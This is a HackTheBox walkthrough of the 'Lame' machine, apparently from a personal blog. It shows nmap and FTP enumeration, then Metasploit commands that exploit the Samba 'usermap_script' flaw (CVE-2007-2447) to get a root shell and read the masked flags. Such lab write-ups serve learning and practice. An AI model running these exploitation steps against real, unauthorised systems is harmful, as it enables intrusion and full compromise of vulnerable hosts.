HackTheBox Lame Walkthrough
Initial Enumeration
I started the initial enumeration by running a port scan looking for open ports and running services. The nmap scan for me was not working at first because the host was blocking ping probes. So I added the -Pn
flag in the end.
┌──(madhav㉿kali)-[~/ctf/htb/lame]
└─$ nmap -sC -sV -oN nmap/initial 10.10.10.3 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 18:53 IST
Nmap scan report for 10.10.10.3 (10.10.10.3)
Host is up (0.20s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.9
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2022-07-05T09:24:25-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m19s, deviation: 2h49m43s, median: 18s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.36 seconds
We have four ports open. We have FTP running on port 21, SSH on port 22 and SMB on port 139 and 445.
Enumerating FTP
First let's begin the enumeration by enumerating FTP. We have anonymous login enabled, so we can login into the FTP server without using a password.
┌──(madhav㉿kali)-[~/ctf/htb/lame]
└─$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
229 Entering Extended Passive Mode (|||5687|).
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> exit
221 Goodbye.
There were no files stored on the FTP server. So next let's move on to the SMB server.
Exploiting SMB
From the nmap scan, we know that the target has Samba smbd version 3.0.20-Debian
installed. On searching on Google, I found that this version is vulnerable to Remote Code Execution (CVE-2007-2447).
I also searched on the exploitdb and found that we also have a metasploit module to exploit the same.
┌──(madhav㉿kali)-[~/ctf/htb/lame]
└─$ searchsploit Samba 3.0.2
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
So let's open msfconsole
and try running the exploit.
use exploit/multi/samba/usermap_script
set LHOST tun0
set RHOSTS 10.10.10.3
exploit
Hurray! we got a shell as user root. Now we can read our user and root flag. The user flag is present in the /home/makis
directory and the root flag is present in the /root/directory
.
cat /home/makis/user.txt
********************************
cat /root/flag.txt
********************************
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Aliz Buzas.